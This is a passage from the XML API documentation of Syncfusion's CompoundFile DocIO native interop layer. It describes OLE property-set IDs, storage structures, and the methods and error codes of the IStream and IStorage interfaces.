        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDSI.LastPrinted">
            <summary>
            LastPrinted Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDSI.Create_dtm">
            <summary>
            Create_dtm Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDSI.LastSave_dtm">
            <summary>
            LastSave_dtm Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDSI.Pagecount">
            <summary>
            Pagecount Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDSI.Wordcount">
            <summary>
            Wordcount Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDSI.Charcount">
            <summary>
            Charcount Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDSI.Thumbnail">
            <summary>
            Thumbnail Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDSI.Appname">
            <summary>
            Appname Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDSI.Doc_security">
            <summary>
            Doc_security Id.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.PIDDSI">
            <summary>
            Property IDs for the DocSummaryInformation Property Set.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDDSI.Category">
            <summary>
            Category Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDDSI.PresFormat">
            <summary>
            PresFormat Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDDSI.ByteCount">
            <summary>
            ByteCount Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDDSI.LineCount">
            <summary>
            LineCount Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDDSI.ParCount">
            <summary>
            ParCount Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDDSI.SlideCount">
            <summary>
            SlideCount Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDDSI.NoteCount">
            <summary>
            NoteCount Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDDSI.HiddenCount">
            <summary>
            HiddenCount Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDDSI.MmclipCount">
            <summary>
            MmclipCount Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDDSI.Scale">
            <summary>
            Scale Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDDSI.HeadingPair">
            <summary>
            HeadingPair Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDDSI.DocParts">
            <summary>
            DocParts Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDDSI.Manager">
            <summary>
            Manager Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDDSI.Company">
            <summary>
            Company Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PIDDSI.LinksDirty">
            <summary>
            LinksDirty Id.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.PID">
            <summary>
            Reserved global Property IDs.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PID.PID_DICTIONARY">
            <summary>
            PID_DICTIONARY Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PID.PID_CODEPAGE">
            <summary>
            PID_CODEPAGE Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PID.PID_FIRST_USABLE">
            <summary>
            PID_FIRST_USABLE Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PID.PID_FIRST_NAME_DEFAULT">
            <summary>
            PID_FIRST_NAME_DEFAULT Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PID.PID_LOCALE">
            <summary>
            PID_LOCALE Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PID.PID_MODIFY_TIME">
            <summary>
            PID_MODIFY_TIME Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PID.PID_SECURITY">
            <summary>
            PID_SECURITY Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PID.PID_BEHAVIOR">
            <summary>
            PID_BEHAVIOR Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PID.PID_ILLEGAL">
            <summary>
            PID_ILLEGAL Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PID.PID_MIN_READONLY">
            <summary>
            PID_MIN_READONLY Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PID.PID_MAX_READONLY">
            <summary>
            PID_MAX_READONLY Id.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.PRSPEC">
            <summary>
            PRSPEC property ids.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PRSPEC.PRSPEC_INVALID">
            <summary>
            INVALID Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PRSPEC.PRSPEC_LPWSTR">
            <summary>
            LPWSTR Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PRSPEC.PRSPEC_PROPID">
            <summary>
            PROPID Id.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.STATSTG">
            <summary>
            The STATSTG structure contains statistical information about an open storage,
             stream, or byte-array object.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STATSTG.pwcsName">
            <summary>
            Pointer to a NULL-terminated Unicode string containing the name. 
            Space for this string is allocated by the method called and freed by the caller
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STATSTG.type">
            <summary>
            Indicates the type of storage object. This is one of the 
            values from the STGTY enumeration.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STATSTG.cbSize">
            <summary>
            Specifies the size in bytes of the stream or byte array.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STATSTG.mtime">
            <summary>
            Indicates the last modification time for this storage, stream, or byte array.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STATSTG.ctime">
            <summary>
            Indicates the creation time for this storage, stream, or byte array. 
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STATSTG.atime">
            <summary>
            Indicates the last access time for this storage, stream or byte array. 
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STATSTG.grfMode">
            <summary>
            Indicates the access mode specified when the object was opened. 
            This member is only valid in calls to Stat methods.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STATSTG.grfLocksSupported">
            <summary>
            Indicates the types of region locking supported by the stream or byte array. 
            See the LOCKTYPE enumeration for the values available. 
            This member is not used for storage objects.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STATSTG.clsid">
            <summary>
            Indicates the class identifier for the storage object; set to CLSID_NULL for new storage objects. 
            This member is not used for streams or byte arrays.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STATSTG.grfStateBits">
            <summary>
            Indicates the current state bits of the storage object; that is, the value most 
            recently set by the IStorage::SetStateBits method. 
            This member is not valid for streams or byte arrays. 
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STATSTG.reserved">
            <summary>
            Reserved for future use.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.STGOPTIONS">
            <summary>
            Structure that is used by STG API.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.tagRemSNB">
            <summary>
            Structure that is used by STG API.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.tagRemSNB.ulCntStr">
            <summary>
            uint parameter.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.tagRemSNB.ulCntChar">
            <summary>
            uint parameter.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.tagRemSNB.rgString">
            <summary>
            OLECHAR parameter.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.tagSTATPROPSETSTG">
            <summary>
            Macros for parsing the OS Version of the Property Set Header.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.tagSTATPROPSETSTG.atime">
            <summary>
            Time in UTC when this property set was last accessed.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.tagSTATPROPSETSTG.clsid">
            <summary>
            CLSID associated with this property set, specified when the property set was initially created 
            and possibly modified thereafter with IPropertyStorage::SetClass. If not set, the value will be CLSID_NULL.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.tagSTATPROPSETSTG.ctime">
            <summary>
            Time in UTC when this property set was created.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.tagSTATPROPSETSTG.dwOSVersion">
            <summary>
            Os vorsion.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.tagSTATPROPSETSTG.fmtid">
            <summary>
            FMTID of the current property set, specified when the property set was initially created.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.tagSTATPROPSETSTG.grfFlags">
            <summary>
            Flag values of the property set, as specified in IPropertySetStorage::Create. 
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.tagSTATPROPSETSTG.mtime">
            <summary>
            Time in Universal Coordinated Time (UTC) when the property set was last modified.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.tagSTATPROPSTG">
            <exclude/>
             <summary>
             The STATPROPSTG structure contains data about a single property in a property set. 
             This data is the property ID and type tag, and the optional string name that may be associated with the property.
             </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.tagSTATPROPSTG.lpwstrName">
            <summary>
            A wide-character null-terminated Unicode string that contains the optional string name 
            associated with the property. May be NULL.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.tagSTATPROPSTG.propid">
            <summary>
            A 32-bit identifier that uniquely identifies the property within the property set. 
            All properties within property sets must have unique property identifiers.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.tagSTATPROPSTG.vt">
            <summary>
            The property type.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.PROPSPEC">
            <summary>
            The PROPSPEC structure is used by many of the methods of IPropertyStorage to specify a 
            property either by its property identifier (ID) or the associated string name.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PROPSPEC.ulKind">
            <summary>
            Indicates the union member used. This member can be one of the following values.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PROPSPEC.propid">
            <summary>
            Specifies the value of the property ID. Use either this value or the following lpwstr, not both.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.VARTYPE">
            <summary>
            This enumeration is used in VARIANT, TYPEDESC, OLE property sets, and safe arrays.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.VARTYPE.VT_EMPTY">
            <summary>
            Variable type is not specified.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.VARTYPE.VT_I4">
            <summary>
            Variable type is 4-byte signed INT.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.VARTYPE.VT_DATE">
            <summary>
            Variable type is date.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.VARTYPE.VT_BSTR">
            <summary>
            Variable type is binary string.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.VARTYPE.VT_BOOL">
            <summary>
            Variable type is Boolean; True=-1, False=0.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.VARTYPE.VT_VARIANT">
            <summary>
            Variable type is VARIANT FAR*. 
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.VARTYPE.VT_INT">
            <summary>
            Variable type is int.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.VARTYPE.VT_LPSTR">
            <summary>
            Variable type is LPSTR.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.VARTYPE.VT_LPWSTR">
            <summary>
            Variable type is LPWSTR
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.VARTYPE.VT_FILETIME">
            <summary>
            Variable type is FILENAME string.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.VARTYPE.VT_VECTOR">
            <summary>
            Variable type is binary VECTOR.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.IEnumSTATSTG">
            <summary>
            The IEnumSTATSTG interface enumerates an array of STATSTG structures. 
            These structures contain statistical data about open storage, stream, or byte array objects. 
            IEnumSTATSTG has the same methods as all enumerator interfaces: Next, Skip, Reset, and Clone. 
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IEnumSTATSTG.Next(System.UInt32,Syncfusion.CompoundFile.DocIO.Native.STATSTG@,System.UInt32@)">
            <summary>
            The Next method retrieves a specified number of STATSTG structures, 
            that follow subsequently in the enumeration sequence. 
            If there are fewer than the requested number of STATSTG structures left 
            in the enumeration sequence, it retrieves the remaining STATSTG structures.
            </summary>
            <param name="celt">The number of STATSTG structures requested.</param>
            <param name="rgelt">An array of STATSTG structures returned.</param>
            <param name="pceltFetched"> The number of STATSTG structures retrieved in the rgelt parameter.</param>
            <returns>S_OK - The number of STATSTG structures returned equals the number 
            specified in the celt parameter.
            S_FALSE - The number of STATSTG structures returned is less than the number 
            specified in the celt parameter.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IEnumSTATSTG.Skip(System.UInt32)">
            <summary>
            The Skip method skips a specified number of STATSTG structures in the enumeration sequence.
            </summary>
            <param name="celt">The number of STATSTG structures to skip. </param>
            <returns>S_OK - The specified number of STATSTG structures were successfully skipped.
            S_FALSE - The number of STATSTG structures skipped is less than the celt parameter.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IEnumSTATSTG.Reset">
            <summary>
            The Reset method resets the enumeration sequence to the beginning of the STATSTG structure array.
            </summary>
            <returns>S_OK - The enumeration sequence was successfully reset to the 
            beginning of the enumeration.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IEnumSTATSTG.Clone(Syncfusion.CompoundFile.DocIO.Native.IEnumSTATSTG@)">
            <summary>
            The Clone method creates a new enumerator that contains the same enumeration state as 
            the current STATSTG structure enumerator. Using this method, a client can record a 
            particular point in the enumeration sequence and then return to that point at a later time. 
            The new enumerator supports the same IEnumSTATSTG interface.
            </summary>
            <param name="ppenum">A pointer to the variable that receives the IEnumSTATSTG interface pointer. 
            If the method is unsuccessful, the value of the ppenum parameter is undefined.</param>
            <returns>E_INVALIDARG - The ppenum parameter is NULL.
            E_OUTOFMEMORY - Insufficient memory.
            E_UNEXPECTED - An unexpected exception occurred.</returns>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.IStream">
            <summary>
            For more information, refer to documentation on MSDN for interface with the same name.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IStream.Read(System.Byte[],System.UInt32,System.UInt32@)">
            <summary>
            Reads a specified number of bytes from the stream object into memory starting
            at the current seek pointer.
            </summary>
            <param name="pv">[out] Pointer to the buffer into which the stream data is read.</param>
            <param name="cb">[in] Specifies the number of bytes of data to attempt to read
            from the stream object.</param>
            <param name="pcbRead">[out] Pointer to a ULONG variable that receives the actual
            number of bytes read from the stream object. You can set this pointer to NULL to
            indicate that you are not interested in this value. In this case, this method
            does not provide the actual number of bytes read.</param>
            <returns>
            S_OK
            Data was successfully read from the stream object.
            S_FALSE
            The data could not be read from the stream object.
            E_PENDING
            Asynchronous storage only: Part or all of the data to be read is currently unavailable. For more information, see IFillLockBytes and Asynchronous Storage.
            STG_E_ACCESSDENIED
            The caller does not have enough permissions for reading this stream object.
            STG_E_INVALIDPOINTER
            One of the pointer values is not valid.
            STG_E_REVERTED
            The object has been invalidated by a revert operation above it in the transaction tree.
            </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IStream.Write(System.Byte[],System.UInt32,System.UInt32@)">
            <summary>
            Writes a specified number of bytes into the stream object starting at the
            current seek pointer.
            </summary>
            <param name="pv">[in] Pointer to the buffer containing the data that is to be
            written to the stream. A valid pointer must be provided for this parameter even
            when cb is zero.</param>
            <param name="cb">[in] The number of bytes of data to attempt to write into the
            stream. Can be zero.</param>
            <param name="pcbWritten">[out] Pointer to a ULONG variable where this method
            writes the actual number of bytes written to the stream object. The caller can
            set this pointer to NULL, in which case this method does not provide the actual
            number of bytes written.</param>
            <returns>
            S_OK
            The data was successfully written to the stream object.
            E_PENDING
            Asynchronous Storage only: Part or all of the data to be written is currently
            unavailable. For more information, see IFillLockBytes and Asynchronous Storage.
            STG_E_MEDIUMFULL
            The write operation was not completed because there is no space left on the storage
            device.
            STG_E_ACCESSDENIED
            The caller does not have enough permissions for writing to this stream object.
            STG_E_CANTSAVE
            Data cannot be written for reasons other than improper access or insufficient space.
            STG_E_INVALIDPOINTER
            One of the pointer values is not valid. The pv parameter must contain a valid pointer
            even if cb is zero.
            STG_E_REVERTED
            The object has been invalidated by a revert operation above it in the transaction tree.
            STG_E_WRITEFAULT
            The write operation was not completed due to a disk error. This value is also returned
            when this method attempts to write to a stream that was opened in simple mode (using
            the STGM_SIMPLE flag).
            </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IStream.Seek(System.Int64,System.IO.SeekOrigin,System.Int64@)">
            <summary>
            Changes the seek pointer to a new location relative to the beginning of
            the stream, the end of the stream, or the current seek pointer.
            </summary>
            <param name="dlibMove">[in] Displacement to be added to the location indicated by
            the dwOrigin parameter. If dwOrigin is STREAM_SEEK_SET, this is interpreted as an
            unsigned value rather than a signed value.</param>
            <param name="dwOrigin">[in] Specifies the origin for the displacement specified in
            dlibMove. The origin can be the beginning of the file, the current seek pointer,
            or the end of the file. See the STREAM_SEEK enumeration for the values.</param>
            <param name="plibNewPosition">[out] Pointer to the location where this method writes
            the value of the new seek pointer from the beginning of the stream. You can set this
            pointer to NULL to indicate that you are not interested in this value. In this case,
            this method does not provide the new seek pointer.</param>
            <returns>
            S_OK
            The seek pointer has been successfully adjusted.
            E_PENDING
            Asynchronous Storage only: Part or all of the stream's data is currently unavailable.
            For more information, see IFillLockBytes and Asynchronous Storage.
            STG_E_INVALIDPOINTER
            Indicates that the [out] parameter plibNewPosition points to invalid memory, because
            plibNewPosition is not read.
            STG_E_INVALIDFUNCTION
            The dwOrigin parameter contains an invalid value or the dlibMove parameter contains
            a bad offset value. For example, the result of the seek pointer is a negative offset
            value.
            STG_E_REVERTED
            The object has been invalidated by a revert operation above it in the transaction tree.
            </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IStream.SetSize(System.UInt64)">
            <summary>
            Changes the size of the stream object.
            </summary>
            <param name="libNewSize">[in] Specifies the new size of the stream as a number
            of bytes.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IStream.CopyTo(Syncfusion.CompoundFile.DocIO.Native.IStream,System.UInt64,System.UInt64@,System.UInt64@)">
            <summary>
            Copies a specified number of bytes from the current seek pointer in the stream to
            the current seek pointer in another stream.
            </summary>
            <param name="pstm">[in] Pointer to the destination stream. The stream pointed to
            by pstm can be a new stream or a clone of the source stream.</param>
            <param name="cb">[in] Specifies the number of bytes to copy from the source
            stream.</param>
            <param name="pcbRead">[out] Pointer to the location where this method writes the
             actual number of bytes read from the source. You can set this pointer to NULL to
             indicate that you are not interested in this value. In this case, this method
             does not provide the actual number of bytes read.</param>
            <param name="pcbWritten">[out] Pointer to the location where this method writes
            the actual number of bytes written to the destination. You can set this pointer
            to NULL to indicate that you are not interested in this value. In this case,
            this method does not provide the actual number of bytes written.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IStream.Commit(System.UInt32)">
            <summary>
            Ensures that any changes made to a stream object open in transacted mode
            are reflected in the parent storage. If the stream object is open in direct
            mode, IStream::Commit has no effect other than flushing all memory buffers
            to the next-level storage object. The COM compound file implementation of
            streams does not support opening streams in transacted mode.
            </summary>
            <param name="grfCommitFlags">[in] Controls how the changes for the stream
            object are committed. See the STGC enumeration for a definition of these
            values.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IStream.Revert">
            <summary>
            Discards all changes that have been made to a transacted stream since the
            last call to IStream::Commit.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IStream.LockRegion(System.UInt64,System.UInt64,System.UInt32)">
            <summary>
            Restricts access to a specified range of bytes in the stream. Supporting
            this functionality is optional since some file systems do not provide it.
            </summary>
            <param name="libOffset"></param>
            <param name="cb"></param>
            <param name="dwLockType"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IStream.UnlockRegion(System.UInt64,System.UInt64,System.UInt32)">
            <summary>
            Removes the access restriction on a range of bytes previously restricted
            with IStream::LockRegion.
            </summary>
            <param name="libOffset"></param>
            <param name="cb"></param>
            <param name="dwLockType"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IStream.Stat(Syncfusion.CompoundFile.DocIO.Native.STATSTG@,System.UInt32)">
            <summary>
            Retrieves the STATSTG structure for this stream.
            </summary>
            <param name="pstatstg"></param>
            <param name="grfStatFlag"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IStream.Clone(Syncfusion.CompoundFile.DocIO.Native.IStream@)">
            <summary>
            Creates a new stream object that references the same bytes as the original
            stream but provides a separate seek pointer to those bytes.
            </summary>
            <param name="ppstm"></param>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.IStorage">
            <summary>
            Call the methods of IStorage to manage substorages or streams within the current storage. 
            This management includes creating, opening, or destroying substorages or streams, 
            as well as managing aspects such as time stamps, names, and so forth.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IStorage.CreateStream(System.String,Syncfusion.CompoundFile.DocIO.Native.STGM,System.UInt32,System.UInt32,Syncfusion.CompoundFile.DocIO.Native.IStream@)">
            <summary>
            The CreateStream method creates and opens a stream object with the specified 
            name contained in this storage object. All elements within a storage objects, 
            both streams and other storage objects, are kept in the same name space.
            </summary>
            <param name="pwcsName">A pointer to a wide character null-terminated Unicode 
            string that contains the name of the newly created stream. The name can be used 
            later to open or reopen the stream. The name must not exceed 31 characters in 
            length, not including the string terminator. The 000 through 01f characters, 
            serving as the first character of the stream/storage name, are reserved for use by OLE. 
            This is a compound file restriction, not a structured storage restriction.</param>
            <param name="grfMode">Specifies the access mode to use when opening the newly 
            created stream. For more information and descriptions of the possible values, 
            see STGM Constants.</param>
            <param name="reserved1">Reserved for future use; must be zero.</param>
            <param name="reserved2">Reserved for future use; must be zero. </param>
            <param name="ppstm">On return, pointer to the location of the new IStream interface pointer. 
            This is only valid if the operation is successful. 
            When an error occurs, this parameter is set to NULL.</param>
            <returns>
            S_OK - The new stream was successfully created. 
            E_PENDING - Asynchronous Storage only: Part or all of the 
            necessary data is currently unavailable. For more information, 
            see IFillLockBytes and Asynchronous Storage.
            STG_E_ACCESSDENIED - Not enough permissions to create stream. 
            STG_E_FILEALREADYEXISTS - The name specified for the stream already exists in the storage 
            object and the grfMode parameter includes the value STGM_FAILIFTHERE.
            STG_E_INSUFFICIENTMEMORY - The stream was not created due to a lack of memory.
            STG_E_INVALIDFLAG - The value specified for the grfMode parameter is not a valid STGM Constants value.
            STG_E_INVALIDFUNCTION - The specified combination of flags in the grfMode parameter is not supported;
            for example, when this method is called without the STGM_SHARE_EXCLUSIVE flag.
            STG_E_INVALIDNAME - Invalid value for pwcsName.
            STG_E_INVALIDPOINTER - The pointer specified for the stream object was invalid. 
            STG_E_INVALIDPARAMETER - One of the parameters was invalid.
            STG_E_REVERTED - The storage object has been invalidated by a revert operation 
            above it in the transaction tree.
            STG_E_TOOMANYOPENFILES - The stream was not created because there are too many open files.
            </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IStorage.OpenStream(System.String,System.UInt32,Syncfusion.CompoundFile.DocIO.Native.STGM,System.UInt32,Syncfusion.CompoundFile.DocIO.Native.IStream@)">
            <summary>
            The OpenStream method opens an existing stream object within this storage 
            object in the specified access mode.
            </summary>
            <param name="pwcsName">A pointer to a wide character null-terminated Unicode 
            string that contains the name of the stream to open. The 000 through 01f 
            characters, serving as the first character of the stream/storage name, are 
            reserved for use by OLE. This is a compound file restriction, not a structured 
            storage restriction.</param>
            <param name="cbReserved1">Reserved for future use; must be NULL.</param>
            <param name="grfMode"> Specifies the access mode to be assigned to the open stream. 
            For more information and descriptions of possible values, see STGM Constants. 
            Other modes you choose must at least specify STGM_SHARE_EXCLUSIVE when calling this 
            method in the compound file implementation.</param>
            <param name="reserved2">Reserved for future use; must be zero.</param>
            <param name="ppstm">A pointer to IStream pointer variable that receives the 
            interface pointer to the newly opened stream object. If an error occurs, *ppstm must be set to NULL.</param>
            <returns>
            S_OK - The stream was successfully opened.
            E_PENDING - Asynchronous Storage only: Part or all of the stream data is currently unavailable.
            STG_E_ACCESSDENIED - Not enough permissions to open stream. 
            STG_E_FILENOTFOUND - The stream with specified name does not exist.
            STG_E_INSUFFICIENTMEMORY - The stream was not opened due to a lack of memory. 
            STG_E_INVALIDFLAG - The value specified for the grfMode parameter is not a valid STGM Constants value.
            STG_E_INVALIDFUNCTION - The specified combination of flags in the grfMode parameter is not supported;
            for example, when this method is called without the STGM_SHARE_EXCLUSIVE flag.
            STG_E_INVALIDNAME - Invalid value for pwcsName.
            STG_E_INVALIDPOINTER - The pointer specified for the stream object was not valid.
            STG_E_INVALIDPARAMETER - One of the parameters was not valid. 
            STG_E_REVERTED - The storage object has been invalidated by a revert operation above it in the transaction tree.
            STG_E_TOOMANYOPENFILES - The stream was not opened because there are too many open files.
            </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IStorage.CreateStorage(System.String,Syncfusion.CompoundFile.DocIO.Native.STGM,System.UInt32,System.UInt32,Syncfusion.CompoundFile.DocIO.Native.IStorage@)">
            <summary>
            The CreateStorage method creates and opens a new storage object nested within this storage 
            object with the specified name in the specified access mode.
            </summary>
            <param name="pwcsName">A pointer to a wide character null-terminated Unicode string that 
            contains the name of the newly created storage object. The name can be used later to 
            reopen the storage object. The name must not exceed 31 characters in length, not 
            including the string terminator. The 000 through 01f characters, serving as the 
            first character of the stream/storage name, are reserved for use by OLE. This is a 
            compound file restriction, not a structured storage restriction.</param>
            <param name="grfMode">A value that specifies the access mode to use when opening 
            the newly created storage object. For more information and a description of possible values</param>
            <param name="reserved1">Reserved for future use; must be zero.</param>
            <param name="reserved2">Reserved for future use; must be zero.</param>
            <param name="ppstg">A pointer, when successful, to the location of the IStorage pointer to 
            the newly created storage object. This parameter is set to NULL if an error occurs.</param>
            <returns>
            S_OK - The storage object was created successfully.
            E_PENDING - Asynchronous Storage only: Part or all of the necessary data is currently unavailable.
            STG_E_ACCESSDENIED - Not enough permissions to create storage object.
            STG_E_FILEALREADYEXISTS - The name specified for the storage object already exists in the 
            storage object and the grfMode parameter includes the flag STGM_FAILIFTHERE.
            STG_E_INSUFFICIENTMEMORY - The storage object was not created due to a lack of memory. 
            STG_E_INVALIDFLAG - The value specified for the grfMode parameter is not a valid STGM Constants value.
            STG_E_INVALIDFUNCTION - The specified combination of flags in the grfMode parameter is not supported. 
            STG_E_INVALIDNAME - Not a valid value for pwcsName.
            STG_E_INVALIDPOINTER - The pointer specified for the storage object was not valid. 
            STG_E_INVALIDPARAMETER - One of the parameters was not valid. 
            STG_E_REVERTED - The storage object has been invalidated by a revert operation above it in the transaction tree.
            STG_E_TOOMANYOPENFILES - The storage object was not created because there are too many open files. 
            STG_S_CONVERTED - The existing stream with the specified name was replaced with a new storage object 
            containing a single stream called CONTENTS. The new storage object will be added.
            </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IStorage.OpenStorage(System.String,System.IntPtr,Syncfusion.CompoundFile.DocIO.Native.STGM,System.IntPtr,System.UInt32,Syncfusion.CompoundFile.DocIO.Native.IStorage@)">
            <summary>
            The OpenStorage method opens an existing storage object with the specified name in the specified access mode.
            </summary>
            <param name="pwcsName">A pointer to a wide character null-terminated Unicode string that 
            contains the name of the storage object to open. The 000 through 01f characters, 
            serving as the first character of the stream/storage name, are reserved for use by 
            OLE. This is a compound file restriction, not a structured storage restriction. 
            It is ignored if pstgPriority is non-NULL. </param>
